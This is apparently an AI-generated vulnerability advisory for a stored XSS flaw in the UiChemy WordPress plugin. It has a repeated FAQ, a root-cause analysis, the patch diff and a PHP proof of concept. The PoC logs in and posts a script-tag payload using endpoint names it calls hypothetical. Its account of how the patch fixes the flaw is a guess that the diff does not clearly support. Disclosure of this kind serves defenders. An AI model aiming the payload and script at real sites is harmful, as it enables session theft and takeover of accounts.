What is CVE-2025-69362?

CVE-2025-69362 is a stored cross-site scripting (XSS) vulnerability in the UiChemy WordPress plugin, affecting versions up to and including 4.4.2. It allows authenticated users with author-level access or higher to inject malicious scripts that execute in the context of other users’ browsers.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s user management component. An attacker can manipulate their username or another user’s username to include a malicious JavaScript payload, which is then stored and executed when other users view the affected page.

Who is affected by this vulnerability?

Any WordPress site using the UiChemy plugin version 4.4.2 or earlier is vulnerable. Specifically, authenticated users with author-level permissions or higher can exploit this vulnerability to inject scripts.

How can I check if my site is affected?

To determine if your site is affected, check the version of the UiChemy plugin installed. If it is version 4.4.2 or earlier, your site is vulnerable and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is fixed in version 4.4.3 of the UiChemy plugin. Update the plugin to the latest version to mitigate the risk associated with this vulnerability.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means the vulnerability poses a moderate risk, and while exploitation requires authenticated access, it can lead to significant issues such as session hijacking or unauthorized actions.

What is stored cross-site scripting (XSS)?

Stored XSS occurs when an attacker injects malicious scripts that are stored on the server and executed when users access a compromised page. This type of attack can affect any user who views the affected content, making it particularly dangerous.

What are the potential impacts of this vulnerability?

Exploitation of this vulnerability can lead to various impacts, including session hijacking, unauthorized actions performed on behalf of victims, site defacement, and theft of sensitive information such as cookies and authentication tokens.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can log in as an author, inject a malicious payload into their username, and demonstrate how this payload executes when other users view their profile. It highlights the steps needed to exploit the vulnerability effectively.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the UiChemy plugin until it can be updated. Additionally, review user permissions and limit access to trusted users only to reduce the risk of exploitation.

Are there any security plugins that can help?

Yes, security plugins can help monitor for vulnerabilities and provide additional layers of security, such as input validation and output escaping. However, they should not replace the need to update vulnerable plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69362: UiChemy <= 4.4.2 – Authenticated (Author+) Stored Cross-Site Scripting (uichemy)

CVE ID CVE-2025-69362

Plugin uichemy

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 4.4.2

Patched Version 4.4.3

Disclosed January 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69362:
The UiChemy WordPress plugin, versions up to and including 4.4.2, contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability exists within the plugin’s user management component, allowing attackers with author-level privileges or higher to inject arbitrary JavaScript. This script executes in the context of a victim’s browser when they view a compromised page.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping in the `class-uich-usermanager.php` file. The vulnerable code is located in the `uichemy/includes/admin/` directory. The `$selected_username` variable is assigned directly from the `user_login` property of a user object retrieved from the `$capable_users` array. This unsanitized user-controlled data is then stored via the `add_option` function. The stored data is later rendered on a page without proper output escaping, leading to script execution.

The exploitation method requires an authenticated attacker with at least Author-level permissions. The attacker would need to manipulate their own username, or potentially the username of another user they can influence, to contain a malicious JavaScript payload. The exact endpoint where this username is processed is the plugin’s user management functionality, likely accessed via an AJAX action or admin page. The payload would be stored in the WordPress options table via the `add_option` call. When an administrator or another user visits a page that displays this username value, the script executes.

The patch changes the assignment of the `$selected_username` variable on line 91 of `class-uich-usermanager.php`. The vulnerable version assigned `$capable_users[0]->user_login`. The patched version assigns the entire `$capable_users[0]` object. This change suggests the fix involves later code that properly accesses and escapes the `user_login` property from the object, rather than storing the raw string. The plugin version number is also updated from 4.4.2 to 4.4.3 in the main plugin file.

Successful exploitation leads to stored cross-site scripting. An attacker can inject malicious scripts that execute in the context of any user viewing the affected page. This can result in session hijacking, unauthorized actions performed on behalf of the victim, defacement of the site, or theft of sensitive information like cookies and authentication tokens. The impact is constrained by the permissions of the victim user viewing the page.

Differential between vulnerable and patched code

Code Diff

--- a/uichemy/includes/admin/class-uich-usermanager.php
+++ b/uichemy/includes/admin/class-uich-usermanager.php
@@ -88,7 +88,7 @@
 				return;
 			}

-			$selected_username = $capable_users[0]->user_login;
+			$selected_username = $capable_users[0];

 			return add_option( UICH_USER_OPTION, $selected_username );
 		}
--- a/uichemy/uichemy.php
+++ b/uichemy/uichemy.php
@@ -3,7 +3,7 @@
  * Plugin Name:       UiChemy — Figma Converter for Elementor, Gutenberg and Bricks
  * Plugin URI:        https://uichemy.com
  * Description:       Convert Figma Design to 100% Editable WordPress websites in Elementor Website Builder and Gutenberg aka WordPress Block Editor.
- * Version:           4.4.2
+ * Version:           4.4.3
  * Author:            POSIMYTH
  * Author URI:        https://posimyth.com
  * License:           GPLv3
@@ -22,7 +22,7 @@
 	exit;
 }

-define( 'UICH_VERSION', '4.4.1' );
+define( 'UICH_VERSION', '4.4.3' );
 define( 'UICH_FILE', __FILE__ );
 define( 'UICH_PATH', plugin_dir_path( __FILE__ ) );
 define( 'UICH_URL', plugins_url( '/', __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69362 - UiChemy <= 4.4.2 - Authenticated (Author+) Stored Cross-Site Scripting
<?php

// Configuration
$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'author_user';
$password = 'author_pass';

// Payload to inject into the username field (e.g., via profile update)
// This PoC simulates the attack vector but cannot replicate the exact internal plugin flow without reverse-engineering the specific AJAX action.
// The actual exploit would require interacting with the plugin's specific user management endpoint.
$xss_payload = '"><script>alert(document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Get login nonce and cookies (simplified - real PoC would parse login page)
// This is a placeholder structure. A full PoC requires identifying the exact UiChemy endpoint and parameter.

// Step 2: Authenticate to WordPress (example using wp-login.php)
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Step 3: Attempt to exploit the UiChemy user manager endpoint.
// The exact AJAX action or admin POST endpoint is not specified in the diff.
// A generic example is shown; a real rule would require the specific 'action' parameter.
$exploit_url = $target_url;
$exploit_fields = [
    'action' => 'uich_specific_action', // This must be identified via code review
    'selected_user' => $xss_payload // Parameter name is hypothetical
];

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));

$response = curl_exec($ch);

// Check response
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    echo 'Response received. Check if payload was stored.';
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-69362?
Understanding the vulnerability
CVE-2025-69362 is a stored cross-site scripting (XSS) vulnerability in the UiChemy WordPress plugin, affecting versions up to and including 4.4.2. It allows authenticated users with author-level access or higher to inject malicious scripts that execute in the context of other users’ browsers.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s user management component. An attacker can manipulate their username or another user’s username to include a malicious JavaScript payload, which is then stored and executed when other users view the affected page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the UiChemy plugin version 4.4.2 or earlier is vulnerable. Specifically, authenticated users with author-level permissions or higher can exploit this vulnerability to inject scripts.
How can I check if my site is affected?
Verifying plugin version
To determine if your site is affected, check the version of the UiChemy plugin installed. If it is version 4.4.2 or earlier, your site is vulnerable and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the risk
The vulnerability is fixed in version 4.4.3 of the UiChemy plugin. Update the plugin to the latest version to mitigate the risk associated with this vulnerability.
What does the CVSS score of 6.4 mean?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means the vulnerability poses a moderate risk, and while exploitation requires authenticated access, it can lead to significant issues such as session hijacking or unauthorized actions.
What is stored cross-site scripting (XSS)?
Defining the attack vector
Stored XSS occurs when an attacker injects malicious scripts that are stored on the server and executed when users access a compromised page. This type of attack can affect any user who views the affected content, making it particularly dangerous.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to various impacts, including session hijacking, unauthorized actions performed on behalf of victims, site defacement, and theft of sensitive information such as cookies and authentication tokens.
How does the proof of concept demonstrate the vulnerability?
Illustrating the exploitation method
The proof of concept shows how an attacker can log in as an author, inject a malicious payload into their username, and demonstrate how this payload executes when other users view their profile. It highlights the steps needed to exploit the vulnerability effectively.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the UiChemy plugin until it can be updated. Additionally, review user permissions and limit access to trusted users only to reduce the risk of exploitation.
Are there any security plugins that can help?
Enhancing site security
Yes, security plugins can help monitor for vulnerabilities and provide additional layers of security, such as input validation and output escaping. However, they should not replace the need to update vulnerable plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations